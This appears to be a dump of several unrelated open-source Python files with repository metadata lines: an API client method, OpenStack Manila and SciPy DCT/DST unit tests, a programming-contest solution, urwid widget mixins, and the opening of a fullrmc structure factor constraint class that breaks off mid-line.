resource_path = '/0.1/plannings/{planning_id}/routes/{id}/stops/{stop_id}/move/{index}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
if 'stop_id' in params:
path_params['stop_id'] = params['stop_id']
if 'index' in params:
path_params['index'] = params['index']
query_params = {}
header_params = {}
form_params = {}
if 'planning_id' in params:
form_params['planning_id'] = params['planning_id']
if 'id' in params:
form_params['id'] = params['id']
if 'stop_id' in params:
form_params['stop_id'] = params['stop_id']
if 'index' in params:
form_params['index'] = params['index']
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
| gpl-2.0 | -6,249,175,168,843,568,000 | 31.322182 | 132 | 0.558558 | false |
vponomaryov/manila | manila/tests/api/middleware/test_faults.py | 1 | 4107 | # Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils
import six
import webob
import webob.dec
import webob.exc
from manila.api.openstack import wsgi
from manila import test
class TestFaults(test.TestCase):
"""Tests covering `manila.api.openstack.faults:Fault` class."""
def _prepare_xml(self, xml_string):
"""Remove characters from string which hinder XML equality testing."""
xml_string = xml_string.replace(" ", "")
xml_string = xml_string.replace("\n", "")
xml_string = xml_string.replace("\t", "")
return xml_string
def test_400_fault_json(self):
"""Test fault serialized to JSON via file-extension and/or header."""
requests = [
webob.Request.blank('/.json'),
webob.Request.blank('/', headers={"Accept": "application/json"}),
]
for request in requests:
fault = wsgi.Fault(webob.exc.HTTPBadRequest(explanation='scram'))
response = request.get_response(fault)
expected = {
"badRequest": {
"message": "scram",
"code": 400,
},
}
actual = jsonutils.loads(response.body)
self.assertEqual("application/json", response.content_type)
self.assertEqual(expected, actual)
def test_413_fault_json(self):
"""Test fault serialized to JSON via file-extension and/or header."""
requests = [
webob.Request.blank('/.json'),
webob.Request.blank('/', headers={"Accept": "application/json"}),
]
for request in requests:
exc = webob.exc.HTTPRequestEntityTooLarge
fault = wsgi.Fault(exc(explanation='sorry',
headers={'Retry-After': 4}))
response = request.get_response(fault)
expected = {
"overLimit": {
"message": "sorry",
"code": 413,
"retryAfter": 4,
},
}
actual = jsonutils.loads(response.body)
self.assertEqual("application/json", response.content_type)
self.assertEqual(expected, actual)
def test_raise(self):
"""Ensure the ability to raise :class:`Fault` in WSGI-ified methods."""
@webob.dec.wsgify
def raiser(req):
raise wsgi.Fault(webob.exc.HTTPNotFound(explanation='whut?'))
req = webob.Request.blank('/.json')
resp = req.get_response(raiser)
self.assertEqual("application/json", resp.content_type)
self.assertEqual(404, resp.status_int)
self.assertIn(six.b('whut?'), resp.body)
def test_raise_403(self):
"""Ensure the ability to raise :class:`Fault` in WSGI-ified methods."""
@webob.dec.wsgify
def raiser(req):
raise wsgi.Fault(webob.exc.HTTPForbidden(explanation='whut?'))
req = webob.Request.blank('/.json')
resp = req.get_response(raiser)
self.assertEqual("application/json", resp.content_type)
self.assertEqual(403, resp.status_int)
self.assertNotIn(six.b('resizeNotAllowed'), resp.body)
self.assertIn(six.b('forbidden'), resp.body)
def test_fault_has_status_int(self):
"""Ensure the status_int is set correctly on faults."""
fault = wsgi.Fault(webob.exc.HTTPBadRequest(explanation='what?'))
self.assertEqual(400, fault.status_int)
| apache-2.0 | -6,209,282,040,056,393,000 | 36 | 79 | 0.60263 | false |
ProgDan/maratona | URI/uri2690.py | 1 | 1630 | class Main:
def __init__(self):
self.n = int(input())
self.s = ""
def change(self):
self.con = 0
for i in range(0, len(self.s)):
if self.con == 12:
break
elif self.s[i] in ['a', 'k', 'u', 'G', 'Q']:
print(0, end='')
self.con += 1
elif self.s[i] in ['b', 'l', 'v', 'I', 'S']:
print(1, end='')
self.con += 1
elif self.s[i] in ['c', 'm', 'w', 'E', 'O', 'Y']:
print(2, end='')
self.con += 1
elif self.s[i] in ['d', 'n', 'x', 'F', 'P', 'Z']:
print(3, end='')
self.con += 1
elif self.s[i] in ['e', 'o', 'y', 'J', 'T']:
print(4, end='')
self.con += 1
elif self.s[i] in ['f', 'p', 'z', 'D', 'N', 'X']:
print(5, end='')
self.con += 1
elif self.s[i] in ['g', 'q', 'A', 'K', 'U']:
print(6, end='')
self.con += 1
elif self.s[i] in ['h', 'r', 'C', 'M', 'W']:
print(7, end='')
self.con += 1
elif self.s[i] in ['i', 's', 'B', 'L', 'V']:
print(8, end='')
self.con += 1
elif self.s[i] in ['j', 't', 'H', 'R']:
print(9, end='')
self.con += 1
print()
def output(self):
for self.i in range(0, self.n):
self.s = input()
self.change()
if __name__ == '__main__':
obj = Main()
obj.output()
| gpl-3.0 | 6,681,451,894,900,894,000 | 30.960784 | 61 | 0.320245 | false |
DailyActie/Surrogate-Model | 01-codes/scipy-master/scipy/fftpack/tests/test_real_transforms.py | 1 | 14903 | #!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from os.path import join, dirname
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_equal, TestCase
from scipy.fftpack.realtransforms import dct, idct, dst, idst
# Matlab reference data
MDATA = np.load(join(dirname(__file__), 'test.npz'))
X = [MDATA['x%d' % i] for i in range(8)]
Y = [MDATA['y%d' % i] for i in range(8)]
# FFTW reference data: the data are organized as follows:
# * SIZES is an array containing all available sizes
# * for every type (1, 2, 3, 4) and every size, the array dct_type_size
# contains the output of the DCT applied to the input np.linspace(0, size-1,
# size)
FFTWDATA_DOUBLE = np.load(join(dirname(__file__), 'fftw_double_ref.npz'))
FFTWDATA_SINGLE = np.load(join(dirname(__file__), 'fftw_single_ref.npz'))
FFTWDATA_SIZES = FFTWDATA_DOUBLE['sizes']
def fftw_dct_ref(type, size, dt):
x = np.linspace(0, size - 1, size).astype(dt)
dt = np.result_type(np.float32, dt)
if dt == np.double:
data = FFTWDATA_DOUBLE
elif dt == np.float32:
data = FFTWDATA_SINGLE
else:
raise ValueError()
y = (data['dct_%d_%d' % (type, size)]).astype(dt)
return x, y, dt
def fftw_dst_ref(type, size, dt):
x = np.linspace(0, size - 1, size).astype(dt)
dt = np.result_type(np.float32, dt)
if dt == np.double:
data = FFTWDATA_DOUBLE
elif dt == np.float32:
data = FFTWDATA_SINGLE
else:
raise ValueError()
y = (data['dst_%d_%d' % (type, size)]).astype(dt)
return x, y, dt
class TestComplex(TestCase):
def test_dct_complex64(self):
y = dct(1j * np.arange(5, dtype=np.complex64))
x = 1j * dct(np.arange(5))
assert_array_almost_equal(x, y)
def test_dct_complex(self):
y = dct(np.arange(5) * 1j)
x = 1j * dct(np.arange(5))
assert_array_almost_equal(x, y)
def test_idct_complex(self):
y = idct(np.arange(5) * 1j)
x = 1j * idct(np.arange(5))
assert_array_almost_equal(x, y)
def test_dst_complex64(self):
y = dst(np.arange(5, dtype=np.complex64) * 1j)
x = 1j * dst(np.arange(5))
assert_array_almost_equal(x, y)
def test_dst_complex(self):
y = dst(np.arange(5) * 1j)
x = 1j * dst(np.arange(5))
assert_array_almost_equal(x, y)
def test_idst_complex(self):
y = idst(np.arange(5) * 1j)
x = 1j * idst(np.arange(5))
assert_array_almost_equal(x, y)
class _TestDCTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = 14
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
x, yr, dt = fftw_dct_ref(self.type, i, self.rdt)
y = dct(x, type=self.type)
assert_equal(y.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(y / np.max(y), yr / np.max(y), decimal=self.dec,
err_msg="Size %d failed" % i)
def test_axis(self):
nt = 2
for i in [7, 8, 9, 16, 32, 64]:
x = np.random.randn(nt, i)
y = dct(x, type=self.type)
for j in range(nt):
assert_array_almost_equal(y[j], dct(x[j], type=self.type),
decimal=self.dec)
x = x.T
y = dct(x, axis=0, type=self.type)
for j in range(nt):
assert_array_almost_equal(y[:, j], dct(x[:, j], type=self.type),
decimal=self.dec)
class _TestDCTIIBase(_TestDCTBase):
def test_definition_matlab(self):
# Test correspondance with matlab (orthornomal mode).
for i in range(len(X)):
dt = np.result_type(np.float32, self.rdt)
x = np.array(X[i], dtype=dt)
yr = Y[i]
y = dct(x, norm="ortho", type=2)
assert_equal(y.dtype, dt)
assert_array_almost_equal(y, yr, decimal=self.dec)
class _TestDCTIIIBase(_TestDCTBase):
def test_definition_ortho(self):
# Test orthornomal mode.
for i in range(len(X)):
x = np.array(X[i], dtype=self.rdt)
dt = np.result_type(np.float32, self.rdt)
y = dct(x, norm='ortho', type=2)
xi = dct(y, norm="ortho", type=3)
assert_equal(xi.dtype, dt)
assert_array_almost_equal(xi, x, decimal=self.dec)
class TestDCTIDouble(_TestDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 1
class TestDCTIFloat(_TestDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 1
class TestDCTIInt(_TestDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 1
class TestDCTIIDouble(_TestDCTIIBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 2
class TestDCTIIFloat(_TestDCTIIBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 2
class TestDCTIIInt(_TestDCTIIBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 2
class TestDCTIIIDouble(_TestDCTIIIBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestDCTIIIFloat(_TestDCTIIIBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 3
class TestDCTIIIInt(_TestDCTIIIBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 3
class _TestIDCTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = 14
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dct_ref(self.type, i, self.rdt)
x = idct(yr, type=self.type)
if self.type == 1:
x /= 2 * (i - 1)
else:
x /= 2 * i
assert_equal(x.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(x / np.max(x), xr / np.max(x), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestIDCTIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 1
class TestIDCTIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 4
self.type = 1
class TestIDCTIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 4
self.type = 1
class TestIDCTIIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 2
class TestIDCTIIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 2
class TestIDCTIIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 2
class TestIDCTIIIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestIDCTIIIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 3
class TestIDCTIIIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 3
class _TestDSTBase(TestCase):
def setUp(self):
self.rdt = None # dtype
self.dec = None # number of decimals to match
self.type = None # dst type
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dst_ref(self.type, i, self.rdt)
y = dst(xr, type=self.type)
assert_equal(y.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(y / np.max(y), yr / np.max(y), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestDSTIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 1
class TestDSTIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 1
class TestDSTIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 1
class TestDSTIIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 2
class TestDSTIIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 2
class TestDSTIIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 2
class TestDSTIIIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestDSTIIIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 7
self.type = 3
class TestDSTIIIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 7
self.type = 3
class _TestIDSTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = None
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dst_ref(self.type, i, self.rdt)
x = idst(yr, type=self.type)
if self.type == 1:
x /= 2 * (i + 1)
else:
x /= 2 * i
assert_equal(x.dtype, dt)
# XXX: we divide by np.max(x) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(x / np.max(x), xr / np.max(x), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestIDSTIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 12
self.type = 1
class TestIDSTIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 4
self.type = 1
class TestIDSTIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 4
self.type = 1
class TestIDSTIIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 2
class TestIDSTIIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 2
class TestIDSTIIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 2
class TestIDSTIIIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestIDSTIIIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 3
class TestIDSTIIIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 3
class TestOverwrite(object):
"""Check input overwrite behavior """
real_dtypes = [np.float32, np.float64]
def _check(self, x, routine, type, fftsize, axis, norm, overwrite_x,
should_overwrite, **kw):
x2 = x.copy()
routine(x2, type, fftsize, axis, norm, overwrite_x=overwrite_x)
sig = "%s(%s%r, %r, axis=%r, overwrite_x=%r)" % (
routine.__name__, x.dtype, x.shape, fftsize, axis, overwrite_x)
if not should_overwrite:
assert_equal(x2, x, err_msg="spurious overwrite in %s" % sig)
def _check_1d(self, routine, dtype, shape, axis, overwritable_dtypes):
np.random.seed(1234)
if np.issubdtype(dtype, np.complexfloating):
data = np.random.randn(*shape) + 1j * np.random.randn(*shape)
else:
data = np.random.randn(*shape)
data = data.astype(dtype)
for type in [1, 2, 3]:
for overwrite_x in [True, False]:
for norm in [None, 'ortho']:
if type == 1 and norm == 'ortho':
continue
should_overwrite = (overwrite_x
and dtype in overwritable_dtypes
and (len(shape) == 1 or
(axis % len(shape) == len(shape) - 1
)))
self._check(data, routine, type, None, axis, norm,
overwrite_x, should_overwrite)
def test_dct(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(dct, dtype, (16,), -1, overwritable)
self._check_1d(dct, dtype, (16, 2), 0, overwritable)
self._check_1d(dct, dtype, (2, 16), 1, overwritable)
def test_idct(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(idct, dtype, (16,), -1, overwritable)
self._check_1d(idct, dtype, (16, 2), 0, overwritable)
self._check_1d(idct, dtype, (2, 16), 1, overwritable)
def test_dst(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(dst, dtype, (16,), -1, overwritable)
self._check_1d(dst, dtype, (16, 2), 0, overwritable)
self._check_1d(dst, dtype, (2, 16), 1, overwritable)
def test_idst(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(idst, dtype, (16,), -1, overwritable)
self._check_1d(idst, dtype, (16, 2), 0, overwritable)
self._check_1d(idst, dtype, (2, 16), 1, overwritable)
if __name__ == "__main__":
np.testing.run_module_suite()
| mit | -2,302,924,072,416,488,400 | 27.3327 | 86 | 0.551902 | false |
jespino/urwintranet | urwintranet/ui/widgets/mixins.py | 1 | 3127 | # -*- coding: utf-8 -*-
"""
urwintranet.ui.widgets.mixins
~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import urwid
class IgnoreKeyPressMixin(object):
def keypress(self, size, key):
return key
class KeyPressMixin(object):
signals = ["click"]
def keypress(self, size, key):
"""
Send 'click' signal on 'activate' command.
>>> assert Button._command_map[' '] == 'activate'
>>> assert Button._command_map['enter'] == 'activate'
>>> size = (15,)
>>> b = Button("Cancel")
>>> clicked_buttons = []
>>> def handle_click(button):
... clicked_buttons.append(button.label)
>>> connect_signal(b, 'click', handle_click)
>>> b.keypress(size, 'enter')
>>> b.keypress(size, ' ')
>>> clicked_buttons # ... = u in Python 2
[...'Cancel', ...'Cancel']
"""
if self._command_map[key] != urwid.ACTIVATE:
return key
self._emit('click')
def mouse_event(self, size, event, button, x, y, focus):
"""
Send 'click' signal on button 1 press.
>>> size = (15,)
>>> b = Button("Ok")
>>> clicked_buttons = []
>>> def handle_click(button):
... clicked_buttons.append(button.label)
>>> connect_signal(b, 'click', handle_click)
>>> b.mouse_event(size, 'mouse press', 1, 4, 0, True)
True
>>> b.mouse_event(size, 'mouse press', 2, 4, 0, True) # ignored
False
>>> clicked_buttons # ... = u in Python 2
[...'Ok']
"""
if button != 1 or not urwid.util.is_mouse_press(event):
return False
self._emit('click')
return True
class FormMixin(object):
FORM_KEYS = {
"tab": "down",
"shift tab": "up",
}
def keypress(self, size, key):
key = self.FORM_KEYS.get(key, key)
return super().keypress(size, key)
class ViMotionMixin(object):
VI_KEYS = {
"j": "down",
"k": "up",
"h": "left",
"l": "right",
}
def keypress(self, size, key):
key = self.VI_KEYS.get(key, key)
return super().keypress(size, key)
class EmacsMotionMixin(object):
EMACS_KEYS = {
"ctrl n": "down",
"ctrl p": "up",
"ctrl b": "left",
"ctrl f": "right",
}
def keypress(self, size, key):
key = self.EMACS_KEYS.get(key, key)
return super().keypress(size, key)
class NotifierMixin(object):
ERROR_PREFIX = ""
ERROR_ATTR = "error"
INFO_PREFIX = ""
INFO_ATTR = "info"
ALIGN = "center"
def error_msg(self, text):
self.set_text((self.ERROR_ATTR, self.ERROR_PREFIX + text))
self.set_align_mode(self.ALIGN)
def info_msg(self, text):
self.set_text((self.INFO_ATTR, self.INFO_PREFIX + text))
self.set_align_mode(self.ALIGN)
def clear_msg(self):
self.set_text("")
class PlainButtonMixin(object):
button_left = urwid.Text("")
button_right = urwid.Text("")
class NonSelectableMixin(object):
def selectable(self):
return False
| apache-2.0 | 4,975,754,046,936,183,000 | 24.016 | 71 | 0.523825 | false |
bachiraoun/fullrmc | Constraints/StructureFactorConstraints.py | 1 | 64342 | """
StructureFactorConstraints contains classes for all constraints related experimental static structure factor functions.
.. inheritance-diagram:: fullrmc.Constraints.StructureFactorConstraints
:parts: 1
"""
# standard libraries imports
from __future__ import print_function
import itertools, re
# external libraries imports
import numpy as np
from pdbparser.Utilities.Database import is_element_property, get_element_property
from pdbparser.Utilities.Collection import get_normalized_weighting
# fullrmc imports
from ..Globals import INT_TYPE, FLOAT_TYPE, PI, PRECISION, LOGGER
from ..Globals import str, long, unicode, bytes, basestring, range, xrange, maxint
from ..Core.Collection import is_number, is_integer, get_path
from ..Core.Collection import reset_if_collected_out_of_date, get_real_elements_weight
from ..Core.Collection import get_caller_frames
from ..Core.Constraint import Constraint, ExperimentalConstraint
from ..Core.pairs_histograms import multiple_pairs_histograms_coords, full_pairs_histograms_coords
class StructureFactorConstraint(ExperimentalConstraint):
"""
Controls the Structure Factor noted as S(Q) and also called
total-scattering structure function or Static Structure Factor.
S(Q) is a dimensionless quantity and normalized such as the average
value :math:`<S(Q)>=1`.
It is worth mentioning that S(Q) is nothing other than the normalized and
corrected diffraction pattern if all experimental artefacts powder.
The computation of S(Q) is done through an inverse Sine Fourier transform
of the computed pair distribution function G(r).
.. math::
S(Q) = 1+ \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
From an atomistic model and histogram point of view, G(r) is computed as
the following:
.. math::
G(r) = 4 \\pi r (\\rho_{r} - \\rho_{0})
= 4 \\pi \\rho_{0} r (g(r)-1)
= \\frac{R(r)}{r} - 4 \\pi \\rho_{0}
g(r) is calculated after binning all pair atomic distances into a
weighted histograms as the following:
.. math::
g(r) = \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{\\rho_{i,j}(r)}{\\rho_{0}}
= \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{n_{i,j}(r) / v(r)}{N_{i,j} / V}
Where:\n
:math:`Q` is the momentum transfer. \n
:math:`r` is the distance between two atoms. \n
:math:`\\rho_{i,j}(r)` is the pair density function of atoms i and j. \n
:math:`\\rho_{0}` is the average number density of the system. \n
:math:`w_{i,j}` is the relative weighting of atom types i and j. \n
:math:`R(r)` is the radial distribution function (rdf). \n
:math:`N` is the total number of atoms. \n
:math:`V` is the volume of the system. \n
:math:`n_{i,j}(r)` is the number of atoms i neighbouring j at a distance r. \n
:math:`v(r)` is the annulus volume at distance r and of thickness dr. \n
:math:`N_{i,j}` is the total number of atoms i and j in the system. \n
+----------------------------------------------------------------------+
|.. figure:: reduced_structure_factor_constraint_plot_method.png |
| :width: 530px |
| :height: 400px |
| :align: left |
| |
| Reduced structure factor of memory shape Nickel-Titanium alloy. |
+----------------------------------------------------------------------+
:Parameters:
#. experimentalData (numpy.ndarray, string): Experimental data as
numpy.ndarray or string path to load data using numpy.loadtxt
method.
#. dataWeights (None, numpy.ndarray): Weights array of the same number
of points of experimentalData used in the constraint's standard
error computation. Therefore particular fitting emphasis can be
put on different data points that might be considered as more or less
important in order to get a reasonable and plausible modal.\n
If None is given, all data points are considered of the same
importance in the computation of the constraint's standard error.\n
If numpy.ndarray is given, all weights must be positive and all
zeros weighted data points won't contribute to the total
constraint's standard error. At least a single weight point is
required to be non-zeros and the weights array will be automatically
scaled upon setting such as the the sum of all the weights
is equal to the number of data points.
#. weighting (string): The elements weighting scheme. It must be any
atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius) defined
in pdbparser database. In case of xrays or neutrons experimental
weights, one can simply set weighting to 'xrays' or 'neutrons'
and the value will be automatically adjusted to respectively
'atomicNumber' and 'neutronCohb'. If attribute values are
missing in the pdbparser database, atomic weights must be
given in atomsWeight dictionary argument.
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
atoms element and values are custom weights. If None is given
or partially given, missing elements weighting will be fully set
given weighting scheme.
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
#. scaleFactor (number): A normalization scale factor used to normalize
the computed data to the experimental ones.
#. adjustScaleFactor (list, tuple): Used to adjust fit or guess
the best scale factor during stochastic engine runtime.
It must be a list of exactly three entries.\n
#. The frequency in number of generated moves of finding the best
scale factor. If 0 frequency is given, it means that the scale
factor is fixed.
#. The minimum allowed scale factor value.
#. The maximum allowed scale factor value.
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles, among others the main reason is because
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore window function is
used to best imitate the numerical artefacts in the experimental
data.
#. limits (None, tuple, list): The distance limits to compute the
histograms. If None is given, the limits will be automatically
set the the min and max distance of the experimental data.
Otherwise, a tuple of exactly two items where the first is the
minimum distance or None and the second is the maximum distance
or None.
**NB**: If adjustScaleFactor first item (frequency) is 0, the scale factor
will remain untouched and the limits minimum and maximum won't be checked.
.. code-block:: python
# import fullrmc modules
from fullrmc.Engine import Engine
from fullrmc.Constraints.StructureFactorConstraints import StructureFactorConstraint
# create engine
ENGINE = Engine(path='my_engine.rmc')
# set pdb file
ENGINE.set_pdb('system.pdb')
# create and add constraint
SFC = StructureFactorConstraint(experimentalData="sq.dat", weighting="atomicNumber")
ENGINE.add_constraints(SFC)
"""
def __init__(self, experimentalData, dataWeights=None,
weighting="atomicNumber", atomsWeight=None,
rmin=None, rmax=None, dr=None,
scaleFactor=1.0, adjustScaleFactor=(0, 0.8, 1.2),
windowFunction=None, limits=None):
# initialize variables
self.__experimentalQValues = None
self.__experimentalSF = None
self.__rmin = None
self.__rmax = None
self.__dr = None
self.__minimumDistance = None
self.__maximumDistance = None
self.__bin = None
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
self.__Gr2SqMatrix = None
# initialize constraint
super(StructureFactorConstraint, self).__init__( experimentalData=experimentalData, dataWeights=dataWeights, scaleFactor=scaleFactor, adjustScaleFactor=adjustScaleFactor)
# set atomsWeight
self.set_atoms_weight(atomsWeight)
# set elements weighting
self.set_weighting(weighting)
self.__set_weighting_scheme()
# set window function
self.set_window_function(windowFunction)
# set r parameters
self.set_rmin(rmin)
self.set_rmax(rmax)
self.set_dr(dr)
# set frame data
FRAME_DATA = [d for d in self.FRAME_DATA]
FRAME_DATA.extend(['_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__atomsWeight',
'_StructureFactorConstraint__qmin',
'_StructureFactorConstraint__qmax',
'_StructureFactorConstraint__rmin',
'_StructureFactorConstraint__rmax',
'_StructureFactorConstraint__dr',
'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin',
'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__windowFunction',
'_elementsWeight',] )
RUNTIME_DATA = [d for d in self.RUNTIME_DATA]
RUNTIME_DATA.extend( [] )
object.__setattr__(self, 'FRAME_DATA', tuple(FRAME_DATA) )
object.__setattr__(self, 'RUNTIME_DATA', tuple(RUNTIME_DATA) )
def _codify_update__(self, name='constraint', addDependencies=True):
dependencies = []
code = []
if addDependencies:
code.extend(dependencies)
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name}.set_used({val})".format(name=name, val=self.used))
code.append("{name}.set_scale_factor({val})".format(name=name, val=self.scaleFactor))
code.append("{name}.set_adjust_scale_factor({val})".format(name=name, val=self.adjustScaleFactor))
code.append("{name}.set_data_weights(dw)".format(name=name))
code.append("{name}.set_atoms_weight({val})".format(name=name, val=self.atomsWeight))
code.append("{name}.set_window_function(wf)".format(name=name))
code.append("{name}.set_rmin({val})".format(name=name, val=self.rmin))
code.append("{name}.set_rmax({val})".format(name=name, val=self.rmax))
code.append("{name}.set_dr({val})".format(name=name, val=self.dr))
code.append("{name}.set_limits({val})".format(name=name, val=self.limits))
# return
return dependencies, '\n'.join(code)
def _codify__(self, engine, name='constraint', addDependencies=True):
assert isinstance(name, basestring), LOGGER.error("name must be a string")
assert re.match('[a-zA-Z_][a-zA-Z0-9_]*$', name) is not None, LOGGER.error("given name '%s' can't be used as a variable name"%name)
klass = self.__class__.__name__
dependencies = ['import numpy as np','from fullrmc.Constraints import StructureFactorConstraints']
code = []
if addDependencies:
code.extend(dependencies)
x = list(self.experimentalData[:,0])
y = list(self.experimentalData[:,1])
code.append("x = {x}".format(x=x))
code.append("y = {y}".format(y=y))
code.append("d = np.transpose([x,y]).astype(np.float32)")
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name} = {klass}s.{klass}\
(experimentalData=d, dataWeights=dw, weighting='{weighting}', atomsWeight={atomsWeight}, \
